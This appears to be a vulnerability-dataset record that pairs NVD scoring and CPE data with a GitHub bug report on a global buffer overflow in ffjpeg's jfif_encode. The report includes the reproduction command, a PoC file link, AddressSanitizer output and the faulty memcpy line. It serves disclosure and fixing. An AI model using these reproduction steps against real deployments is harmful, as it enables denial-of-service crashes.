"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rockcarry/ffjpeg/issues/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rockcarry/ffjpeg/issues/44"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48",
"versionEndExcluding": null,
"versionEndIncluding": "2021-01-01",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/rockcarry/ffjpeg/issues/44 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"rockcarry",
"ffjpeg"
] | **Describe**
A global-buffer-overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at jfif.c:708.
Found by **Cem Onat Karagun of Diesec**
**System info**
OS version : Ubuntu 21.04
ffjpeg Version : master([0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit/0fa4cf8a86d7f23))
**Reproduce**
Compile ffjpeg with address sanitizer.
```
CCFLAGS = -Wall -g -fsanitize=address
```
PoC file:
[encode_poc1.zip](https://github.com/rockcarry/ffjpeg/files/6704528/encode_poc1.zip)
Run with the following command.
```
$ ffjpeg -e encode_poc1
```
**Asan output:**
```
=================================================================
==3406031==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000231972 at pc 0x0000002cbc07 bp 0x7ffcef6304f0 sp 0x7ffcef62fcb8
READ of size 272 at 0x000000231972 thread T0
#0 0x2cbc06 in __asan_memcpy (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06)
#1 0x30f33b in jfif_encode /src/src/jfif.c:708:5
#2 0x3029f2 in main /src/src/ffjpeg.c:30:16
#3 0x7fdfb0d3b564 in __libc_start_main csu/../csu/libc-start.c:332:16
#4 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
0x000000231972 is located 46 bytes to the left of global variable 'STD_HUFTAB_LUMIN_DC' defined in 'huffman.c:398:12' (0x2319a0) of size 28
0x000000231972 is located 0 bytes to the right of global variable 'STD_HUFTAB_LUMIN_AC' defined in 'huffman.c:382:12' (0x2318c0) of size 178
SUMMARY: AddressSanitizer: global-buffer-overflow (/REDACTED/ffjpeg/src/ffjpeg+0x2cbc06) in __asan_memcpy
Shadow bytes around the buggy address:
0x00008003e2d0: f9 f9 f9 f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
0x00008003e2e0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 01 f9 f9
0x00008003e2f0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 00 00
0x00008003e300: 00 00 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9
0x00008003e310: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008003e320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[02]f9
0x00008003e330: f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9 00 00 00 00
0x00008003e340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008003e350: 00 00 02 f9 f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9
0x00008003e360: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x00008003e370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3406031==ABORTING
```
```
memcpy(jfif->phcac[0]->huftab, STD_HUFTAB_LUMIN_AC, MAX_HUFFMAN_CODE_LEN + 256);
``` | global-buffer-overflow in function jfif_encode at jfif.c:708 | https://api.github.com/repos/rockcarry/ffjpeg/issues/44/comments | 4 | 2021-06-23T19:51:49Z | 2021-12-07T20:05:15Z | https://github.com/rockcarry/ffjpeg/issues/44 | 928,587,983 | 44 | 3,179 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.